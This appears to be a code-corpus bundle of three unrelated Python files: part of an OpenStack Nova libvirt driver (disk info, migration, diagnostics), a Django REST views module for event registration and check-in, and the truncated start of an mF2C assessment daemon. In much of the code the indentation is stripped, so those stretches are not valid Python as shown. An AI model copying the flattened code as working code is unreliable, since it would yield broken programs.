raise exception.InstanceNotFound(instance_id=instance_name)
# NOTE (rmk): When block_device_info is provided, we will use it to
# filter out devices which are actually volumes.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
volume_devices = set()
for vol in block_device_mapping:
disk_dev = vol['mount_device'].rpartition("/")[2]
volume_devices.add(disk_dev)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
target_nodes = doc.findall('.//devices/disk/target')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
target = target_nodes[cnt].attrib['dev']
if disk_type != 'file':
                LOG.debug(_('skipping %s since it looks like a volume'), path)
continue
if not path:
LOG.debug(_('skipping disk for %s as it does not have a path'),
instance_name)
continue
if target in volume_devices:
LOG.debug(_('skipping disk %(path)s (%(target)s) as it is a '
'volume'), {'path': path, 'target': target})
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
over_commit_size = int(virt_size) - dk_size
else:
backing_file = ""
virt_size = 0
over_commit_size = 0
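            # e.g. (hypothetical figures) a qcow2 disk with a 10 GB virtual
            # size but only 2 GB allocated on disk contributes 8 GB to
            # over_committed_disk_size.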
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size,
'over_committed_disk_size': over_commit_size})
return jsonutils.dumps(disk_info)
def get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
        # Disk size that all instances use: virtual_size - disk_size
instances_name = self.list_instances()
disk_over_committed_size = 0
for i_name in instances_name:
try:
disk_infos = jsonutils.loads(
self.get_instance_disk_info(i_name))
for info in disk_infos:
disk_over_committed_size += int(
info['over_committed_disk_size'])
except OSError as e:
if e.errno == errno.ENOENT:
LOG.error(_('Getting disk size of %(i_name)s: %(e)s'),
{'i_name': i_name, 'e': e})
else:
raise
except exception.InstanceNotFound:
# Instance was deleted during the check so ignore it
pass
            # NOTE(gtt116): give other tasks a chance to run.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
        If 'refresh' is True, update the stats first.
"""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
#NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.verify_base_images(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize,
shared_storage=False):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
if not shared_storage:
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def _is_storage_shared_with(self, dest, inst_base):
# NOTE (rmk): There are two methods of determining whether we are
# on the same filesystem: the source and dest IP are the
# same, or we create a file on the dest system via SSH
# and check whether the source system can also see it.
shared_storage = (dest == self.get_host_ip_addr())
if not shared_storage:
tmp_file = uuid.uuid4().hex + '.tmp'
tmp_path = os.path.join(inst_base, tmp_file)
try:
utils.execute('ssh', dest, 'touch', tmp_path)
if os.path.exists(tmp_path):
shared_storage = True
os.unlink(tmp_path)
else:
utils.execute('ssh', dest, 'rm', tmp_path)
except Exception:
pass
return shared_storage
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, network_info,
block_device_info=None):
LOG.debug(_("Starting migrate_disk_and_power_off"),
instance=instance)
disk_info_text = self.get_instance_disk_info(instance['name'],
block_device_info=block_device_info)
disk_info = jsonutils.loads(disk_info_text)
        # Copy disks to the destination. First rename the instance dir to
        # <inst_base>_resize so that shared storage for the instance dir
        # (e.g. NFS) keeps working during the resize.
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
shared_storage = self._is_storage_shared_with(dest, inst_base)
# try to create the directory on the remote compute node
# if this fails we pass the exception up the stack so we can catch
# failures here earlier
if not shared_storage:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
self.power_off(instance)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
try:
utils.execute('mv', inst_base, inst_base_resize)
# if we are migrating the instance with shared storage then
# create the directory. If it is a remote node the directory
# has already been created
if shared_storage:
dest = None
utils.execute('mkdir', '-p', inst_base)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if shared_storage:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize,
shared_storage)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance running successfully."), instance=instance)
raise loopingcall.LoopingCallDone()
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
LOG.debug(_("Starting finish_migration"), instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
for info in disk_info:
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
size *= 1024 * 1024 * 1024
            # If we have a non-partitioned image that we can extend,
            # then ensure we're in 'raw' format so we can extend the
            # file system.
fmt = info['type']
if (size and fmt == 'qcow2' and
disk.can_resize_fs(info['path'], size, use_cow=True)):
path_raw = info['path'] + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', info['path'], path_raw)
utils.execute('mv', path_raw, info['path'])
fmt = 'raw'
if size:
disk.extend(info['path'], size)
if fmt == 'raw' and CONF.use_cow_images:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
path_qcow = info['path'] + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', info['path'], path_qcow)
utils.execute('mv', path_qcow, info['path'])
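            # Rough summary of the block above: a qcow2 image holding a
            # resizable filesystem is converted to raw, extended to the
            # flavor size (e.g. growing a root disk from 10 GB to 20 GB),
            # and, if use_cow_images is set, converted back to qcow2 so that
            # snapshots remain available.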
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
        # assume _create_image does nothing if the target file exists.
        # TODO(oda): injecting files is not necessary
self._create_image(context, instance,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert.
"""
shutil.rmtree(inst_base)
def finish_revert_migration(self, instance, network_info,
block_device_info=None, power_on=True):
LOG.debug(_("Starting finish_revert_migration"),
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
if os.path.exists(inst_base):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
def get_diagnostics(self, instance):
def get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
domain = self._lookup_by_name(instance['name'])
output = {}
        # get cpu time; might raise an exception if the method
        # is not supported by the underlying hypervisor being
        # used by libvirt
try:
cputime = domain.vcpus()[0]
for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = get_io_devices(xml)
for disk in dom_io["volumes"]:
try:
                # blockStats might raise an exception if the method
                # is not supported by the underlying hypervisor being
                # used by libvirt
stats = domain.blockStats(disk)
output[disk + "_read_req"] = stats[0]
output[disk + "_read"] = stats[1]
output[disk + "_write_req"] = stats[2]
output[disk + "_write"] = stats[3]
output[disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
                # interfaceStats might raise an exception if the method
                # is not supported by the underlying hypervisor being
                # used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
        # memoryStats might raise an exception if the method
        # is not supported by the underlying hypervisor being
        # used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def add_to_aggregate(self, context, aggregate, host, **kwargs):
"""Add a compute host to an aggregate."""
#NOTE(jogo) Currently only used for XenAPI-Pool
pass
def remove_from_aggregate(self, context, aggregate, host, **kwargs):
"""Remove a compute host from an aggregate."""
pass
def undo_aggregate_operation(self, context, op, aggregate,
host, set_error=True):
"""only used for Resource Pools."""
pass
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
        LOG.debug(_('Checking instance files accessibility %s'), instance_path)
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
        If 'refresh' is True, update the stats first.
"""
if refresh:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
LOG.debug(_("Updating host stats"))
data = {}
data["vcpus"] = self.driver.get_vcpu_total()
data["vcpus_used"] = self.driver.get_vcpu_used()
data["cpu_info"] = jsonutils.loads(self.driver.get_cpu_info())
disk_info_dict = self.driver.get_local_gb_info()
data["disk_total"] = disk_info_dict['total']
data["disk_used"] = disk_info_dict['used']
data["disk_available"] = disk_info_dict['free']
data["host_memory_total"] = self.driver.get_memory_mb_total()
data["host_memory_free"] = (data["host_memory_total"] -
self.driver.get_memory_mb_used())
data["hypervisor_type"] = self.driver.get_hypervisor_type()
data["hypervisor_version"] = self.driver.get_hypervisor_version()
data["hypervisor_hostname"] = self.driver.get_hypervisor_hostname()
data["supported_instances"] = \
self.driver.get_instance_capabilities()
self._stats = data
return data
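

# Illustrative usage sketch (not part of the original driver): refresh the
# cached host stats once and log a couple of fields.  The `driver` argument
# is whatever libvirt driver instance owns this HostState; the logged fields
# are taken from update_status() above.
def _example_report_host_stats(driver):
    host_state = HostState(driver)
    stats = host_state.get_host_stats(refresh=True)
    LOG.debug(_("Host stats: %(vcpus)s vCPUs, %(free)s MB free memory"),
              {'vcpus': stats['vcpus'], 'free': stats['host_memory_free']})
    return stats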
|
views.py
|
import os
from threading import Thread
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
from django.contrib.auth.models import User, AnonymousUser
from django.contrib.auth import get_user_model
from django.utils import timezone
from django.http import Http404, HttpResponse, FileResponse
from urllib.parse import quote
from rest_framework import generics, status
from rest_framework import permissions
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.decorators import api_view, permission_classes
from rest_framework.serializers import ValidationError
from backend.serializers import *
from backend.permissions import *
from backend.utils.qrcode import text_to_qr
from backend.utils.email import send_activation_email, send_registered_email
from backend.utils.excel import *
def check_is_admin(user, event):
if not isinstance(user, get_user_model()):
return False
if user.is_site_admin:
return True
return UserManageEvent.objects.filter(user=user, event=event).exists()
def check_is_admin_not_site_admin(user, event):
return UserManageEvent.objects.filter(user=user, event=event).exists()
def check_event_registered(user, event):
return UserRegisterEvent.objects.filter(user=user, event=event).exists()
def check_event_register_approved(user, event):
return UserRegisterEvent.objects.filter(user=user, event=event, approved=True).exists()
@api_view(['GET', 'POST'])
def activate_user(request):
if 'token' not in request.data:
raise ValidationError('No token provided.')
try:
user = get_user_model().objects.get(activate_token=request.data.get('token'))
except get_user_model().DoesNotExist:
raise ValidationError('Invalid token.')
if user.is_activated:
raise ValidationError('Already activated.')
if user.activate_token is not None:
user.activate()
return Response(status=status.HTTP_200_OK)
@api_view(['GET'])
@permission_classes((permissions.IsAuthenticated, IsSiteAdminOrSelf))
def send_activation(request):
user = request.user
data = request.GET
if 'user_id' in data:
try:
user = get_user_model().objects.get(id=data.get('user_id'))
except get_user_model().DoesNotExist:
raise ValidationError('User Not Found.')
if user is None or isinstance(user, AnonymousUser):
raise ValidationError('No User Specified.')
if user.is_activated:
raise ValidationError('Already activated.')
user.generate_activate_token()
send_activation_email(user)
return Response(status=status.HTTP_200_OK)
@api_view(['GET', 'POST'])
def gen_qrcode(request):
if 'text' not in request.data:
raise ValidationError('No text provided.')
text = request.data.get('text')
qr_img = text_to_qr(text)
return HttpResponse(qr_img, content_type='image/png')
class DummyView(APIView):
permission_classes = (permissions.IsAuthenticated,)
def get(self, request, format=None):
content = {
'status': 'request was permitted',
'is_activated': request.user.is_activated
}
return Response(content)
class UserProfileView(APIView):
permission_classes = (permissions.IsAuthenticated,)
def get(self, request, format=None):
serializer = UserProfileSerializer(instance=request.user)
return Response(serializer.data)
class UserView(generics.RetrieveUpdateDestroyAPIView):
queryset = get_user_model().objects.all()
serializer_class = UserProfileSerializer
permission_classes = (permissions.IsAuthenticated, IsSiteAdminOrSelf)
class EventList(generics.ListCreateAPIView):
queryset = Event.objects.filter(public=True)
serializer_class = EventListSerializer
permission_classes = (permissions.IsAuthenticatedOrReadOnly, IsActivatedOrReadOnly)
def perform_create(self, serializer):
# user = get_user_model().objects.get(id=self.request.data.get('host_id', ''))
user = self.request.user
desc = ''
if 'description' in self.request.data:
desc = self.request.data.get('description')
event_obj = serializer.save(host=user, description=desc)
ume_obj = UserManageEvent(user=user, event=event_obj)
ume_obj.save()
class PastEventList(generics.ListAPIView):
queryset = Event.objects.filter(public=True, end_time__lte=timezone.now())
serializer_class = EventListSerializer
class FutureEventList(generics.ListAPIView):
queryset = Event.objects.filter(public=True, start_time__gt=timezone.now())
serializer_class = EventListSerializer
class OngoingEventList(generics.ListAPIView):
queryset = Event.objects.filter(public=True, start_time__lte=timezone.now(), end_time__gt=timezone.now())
serializer_class = EventListSerializer
class UserRegisterEventList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserRegisterEvent.objects.filter(user=user)
class UserManageEventList(generics.ListAPIView):
serializer_class = UserManageEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserManageEvent.objects.filter(user=user)
class UserRegisterFutureEventList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserRegisterEvent.objects.filter(user=user, event__start_time__gt=timezone.now())
class UserRegisterPastEventList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserRegisterEvent.objects.filter(user=user, event__end_time__lte=timezone.now())
class UserRegisterOngoingEventList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf)
def get_queryset(self):
# user = get_user_model().objects.get(id=self.kwargs.get('pk'))
user = self.request.user
return UserRegisterEvent.objects.filter(user=user, event__start_time__lte=timezone.now(),
event__end_time__gt=timezone.now())
class UserEventRegister(generics.CreateAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated)
def perform_create(self, serializer):
user = self.request.user
data = self.request.data
if 'user_id' in data:
try:
user = get_user_model().objects.get(id=data.get('user_id'))
            except get_user_model().DoesNotExist:
raise ValidationError('User Not Found.')
if 'event_id' not in data:
raise ValidationError('No event_id specified.')
try:
event = Event.objects.get(id=data.get('event_id'))
except Event.DoesNotExist:
raise ValidationError('Event Not found.')
if check_event_registered(user, event):
if check_event_register_approved(user, event):
raise ValidationError('Already Registered.')
else:
raise ValidationError('Already applied, waiting for approval.')
if event.require_approve:
if event.require_application:
if 'application_text' not in data or data.get('application_text') == '':
raise ValidationError('Need to provide application info.')
serializer.save(user=user, event=event, transport=None, approved=False)
event.newregistration()
send_registered_email(user, event, approved=False)
else:
transport = None
if 'transport_id' in data:
try:
transport = Transport.objects.get(id=data.get('transport_id'))
                except Transport.DoesNotExist:
raise ValidationError('Transport Not found.')
serializer.save(user=user, event=event, transport=transport, approved=True)
event.newregistration()
send_registered_email(user, event, approved=True)
class UserEventConflict(APIView):
queryset = UserRegisterEvent.objects.all()
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf|IsSiteAdminOrEventManager)
def post(self, request, format=None):
data = request.data
user = request.user
if 'user_id' in data:
try:
user = get_user_model().objects.get(id=data.get('user_id'))
except get_user_model().DoesNotExist:
raise ValidationError('User Not Found.')
event = Event.objects.get(id=data.get('event_id'))
if check_event_registered(user, event):
if check_event_register_approved(user, event):
raise ValidationError('Already Registered this event.')
else:
raise ValidationError('Already applied this event, waiting for approval.')
ret_data = {}
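        # Two events conflict iff each one starts before the other ends (interval overlap).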
lst = UserRegisterEvent.objects.filter(user=user,
event__start_time__lte=event.end_time,
event__end_time__gte=event.start_time)
if lst.exists():
ret_data['conflict'] = True
if 'user_id' not in data:
ret_data['user_register_event'] = UserRegisterEventSerializer(lst[0]).data
return Response(ret_data)
ret_data['conflict'] = False
return Response(ret_data)
class ApproveEventRegister(APIView):
queryset = UserRegisterEvent.objects.all()
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
def post(self, request, format=None):
data = request.data
if 'approve' not in data:
raise ValidationError('Need to provide "approve" (Boolean) field.')
approve = data['approve']
if 'user_id' not in data:
raise ValidationError('No user specified.')
try:
user = get_user_model().objects.get(id=data.get('user_id'))
except get_user_model().DoesNotExist:
raise ValidationError('User Not Found.')
event = Event.objects.get(id=data.get('event_id'))
try:
ure_obj = UserRegisterEvent.objects.get(user=user, event=event)
except UserRegisterEvent.DoesNotExist:
raise ValidationError('Not registered/applied.')
if approve:
if ure_obj.approved:
raise ValidationError('Already Approved.')
ure_obj.approve()
event.newapproved()
if not approve:
event.newunregistration(approve)
ure_obj.reject()
ure_obj.delete()
return Response(status=status.HTTP_200_OK)
class UserEventUnregister(APIView):
queryset = UserRegisterEvent.objects.all()
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf|IsSiteAdminOrEventManager)
def post(self, request, format=None):
user = request.user
data = request.data
if 'user_id' in data:
user = get_user_model().objects.get(id=data.get('user_id'))
event = Event.objects.get(id=data.get('event_id'))
if not check_event_registered(user, event):
raise ValidationError('Not registered.')
ure_obj = UserRegisterEvent.objects.get(user=user, event=event)
if ure_obj.checked_in:
raise ValidationError('Already checked in.')
if ure_obj.transport is not None:
ure_obj.transport.delete()
event.newunregistration(ure_obj.approved)
ure_obj.delete()
return Response(status=status.HTTP_200_OK)
class AssignEventAdmin(generics.CreateAPIView):
# Not Tested
serializer_class = UserManageEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
def perform_create(self, serializer):
user = self.request.user
data = self.request.data
if 'user_id' in data:
try:
user = get_user_model().objects.get(id=data.get('user_id'))
            except get_user_model().DoesNotExist:
raise ValidationError('User Not Found.')
event = Event.objects.get(id=data.get('event_id'))
if check_is_admin_not_site_admin(user, event):
raise ValidationError('Is admin already.')
serializer.save(user=user, event=event)
class EventDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Event.objects.all()
serializer_class = EventDetailSerializer
permission_classes = (IsEventHostAdminOrReadOnly|IsAdminUser,)
pk_type = 'event'
def get(self, request, *args, **kwargs):
try:
obj = Event.objects.get(pk=kwargs.get('pk'))
except Event.DoesNotExist:
raise Http404
data = self.retrieve(request, *args, **kwargs).data
data['event_admin'] = check_is_admin(request.user, obj)
try:
ure_obj = UserRegisterEvent.objects.get(user=request.user, event=obj)
data['event_registered'] = True
data['user_register_event'] = UserRegisterEventSerializer(ure_obj).data
except UserRegisterEvent.DoesNotExist:
data['event_registered'] = False
return Response(data)
class EventAttendeeList(generics.ListAPIView):
serializer_class = UserRegisterEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated)
pk_type = 'event'
def get_queryset(self):
try:
event = Event.objects.get(pk=self.kwargs.get('pk'))
except Event.DoesNotExist:
return None
if not check_is_admin(self.request.user, event):
raise ValidationError('Not Authorized.')
return UserRegisterEvent.objects.filter(event=event)
class EventAdminList(generics.ListAPIView):
serializer_class = UserManageEventSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated)
pk_type = 'event'
def get_queryset(self):
try:
event = Event.objects.get(pk=self.kwargs.get('pk'))
except Event.DoesNotExist:
return None
if not check_is_admin(self.request.user, event):
raise ValidationError('Not Authorized.')
return UserManageEvent.objects.filter(event=event)
class TransportCreateView(generics.CreateAPIView):
queryset = Transport.objects.all()
serializer_class = TransportSerializer
permission_classes = (permissions.IsAuthenticated, IsSiteAdminOrSelf|IsSiteAdminOrEventManager)
def perform_create(self, serializer):
user = self.request.user
data = self.request.data
if 'user_id' in data:
user = get_user_model().objects.get(id=data['user_id'])
event = Event.objects.get(id=data.get('event_id'))
try:
tp_obj = Transport.objects.get(user=user, event=event)
tp_obj.delete()
except Transport.DoesNotExist:
pass
finally:
tp_obj = serializer.save(user=user, event=event)
try:
ure_obj = UserRegisterEvent.objects.get(user=user, event=event)
ure_obj.transport = tp_obj
ure_obj.save()
except UserRegisterEvent.DoesNotExist:
pass
class TransportView(generics.RetrieveUpdateDestroyAPIView):
queryset = Transport.objects.all()
serializer_class = TransportSerializer
permission_classes = (permissions.IsAuthenticated, IsOwner|IsEventHostAdmin|IsAdminUser)
pk_type = 'transport'
class EventCheckInList(generics.ListCreateAPIView):
queryset = CheckIn.objects.all()
serializer_class = CheckInSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'event'
def get_queryset(self):
queryset = super(EventCheckInList, self).get_queryset()
return queryset.filter(event__pk=self.kwargs.get('pk'))
def perform_create(self, serializer):
serializer.save(event_id=self.kwargs.get('pk'))
class UserCheckInEvent(APIView):
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrSelf|IsSiteAdminOrEventManager)
pk_type = 'checkin'
def post(self, request, pk, format=None):
try:
checkinobj = CheckIn.objects.get(pk=pk)
except CheckIn.DoesNotExist:
raise Http404
if not checkinobj.started:
raise ValidationError('Check-in not enabled.')
user = request.user
if 'user_id' in request.data:
try:
user = get_user_model().objects.get(id=request.data.get('user_id'))
except get_user_model().DoesNotExist:
raise ValidationError('User not found.')
try:
ure_obj = UserRegisterEvent.objects.get(user=user, event=checkinobj.event)
except UserRegisterEvent.DoesNotExist:
raise ValidationError('Not registered.')
if not ure_obj.approved:
raise ValidationError('Registration not approved.')
self.check_object_permissions(request, ure_obj)
if ure_obj.checked_in and UserCheckIn.objects.filter(ure=ure_obj, checkin=checkinobj).exists():
raise ValidationError('Already checked in.')
uc_obj = UserCheckIn(ure=ure_obj, checkin=checkinobj)
uc_obj.save()
checkinobj.newcheckin()
if not ure_obj.checked_in:
ure_obj.checkin()
ure_obj.save()
return Response(status=status.HTTP_202_ACCEPTED)
class ToggleCheckIn(APIView):
serializer_class = CheckInSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'checkin'
def post(self, request, pk, format=None):
try:
obj = CheckIn.objects.get(pk=pk)
except CheckIn.DoesNotExist:
raise Http404
obj.toggle()
obj.save()
return Response(CheckInSerializer(obj).data, status=status.HTTP_202_ACCEPTED)
class DeleteCheckIn(generics.DestroyAPIView):
queryset = CheckIn.objects.all()
serializer_class = CheckInSerializer
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'checkin'
class ExportExcel(APIView):
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'event'
    def get(self, request, pk, format=None):
        try:
            event = Event.objects.get(pk=pk)
        except Event.DoesNotExist:
            raise Http404
        file_path, file_name = export_excel(event)
        response = FileResponse(open(file_path, 'rb'))
        response['Content-Type'] = 'application/octet-stream'
        response['Content-Disposition'] = 'attachment; filename=' + quote(file_name)
        return response
class ImportExcel(APIView):
permission_classes = (permissions.IsAuthenticated, IsActivated, IsSiteAdminOrEventManager)
pk_type = 'event'
def post(self, request, pk, format=None):
try:
event = Event.objects.get(pk=pk)
except Event.DoesNotExist:
raise Http404
try:
file = request.FILES['file']
except Exception:
raise ValidationError('No file uploaded.')
if file.name.split('.')[-1] != 'xlsx':
raise ValidationError('Not a .xlsx file.')
channel_layer = get_channel_layer()
send = async_to_sync(channel_layer.group_send)
group_name = 'event_%s_import' % event.id
def callback(data):
send(group_name, {
'type': 'import_message',
'message': data
})
t = Thread(target=import_excel, args=(event, file, callback))
t.start()
return Response(status=status.HTTP_202_ACCEPTED)
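

# Illustrative sketch (not part of this module): a Channels consumer that
# could receive the 'import_message' events that ImportExcel sends to the
# 'event_<id>_import' group above.  The class name and URL-route kwarg are
# assumptions; the project's real consumer and routing presumably live elsewhere.
from channels.generic.websocket import AsyncJsonWebsocketConsumer


class _ExampleImportProgressConsumer(AsyncJsonWebsocketConsumer):
    async def connect(self):
        event_id = self.scope['url_route']['kwargs']['event_id']
        self.group_name = 'event_%s_import' % event_id
        await self.channel_layer.group_add(self.group_name, self.channel_name)
        await self.accept()

    async def disconnect(self, close_code):
        await self.channel_layer.group_discard(self.group_name, self.channel_name)

    async def import_message(self, event):
        # Forward the progress payload produced by import_excel's callback.
        await self.send_json(event['message'])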
class DownloadExcelTemplate(APIView):
permission_classes = (permissions.IsAuthenticated, IsActivated)
pk_type = 'event'
def get(self, request, format=None):
file_path = get_import_template()
response = FileResponse(open(file_path, 'rb'))
        response['Content-Type'] = 'application/octet-stream'
response['Content-Disposition'] = 'attachment; filename=' + quote(os.path.basename(IMPORT_TEMPLATE_FILE_PATH))
return response
|
assessment_process.py
|
"""
User Management Assessment process / daemon
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Roi Sucasas Font, Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 27 sept. 2017
@author: Roi Sucasas - ATOS
"""
import time, threading
from usermgnt.data import data_adapter as data_adapter
from usermgnt.data.atos import lifecycle as mf2c
from usermgnt.common.logs import LOG
from usermgnt.common.common import TRACE
execute = False
d = None
# check_resources_used: checks whether the resources used by mF2C apps match the user's profiling and sharing model properties
def __check_resources_used(user_profile, sharing_model, battery_level, total_services):
    result = {}
    try:
        LOG.log(TRACE, "[usermgnt.modules.assessment] [__check_resources_used] << Assessment Process >> [battery_level=" + str(battery_level) + "], "
                       "[total_services=" + str(total_services) + "]")
        if battery_level <= sharing_model['battery_limit']:
            result['battery_limit_violation'] = True
        if not user_profile['resource_contributor'] and total_services > 0:
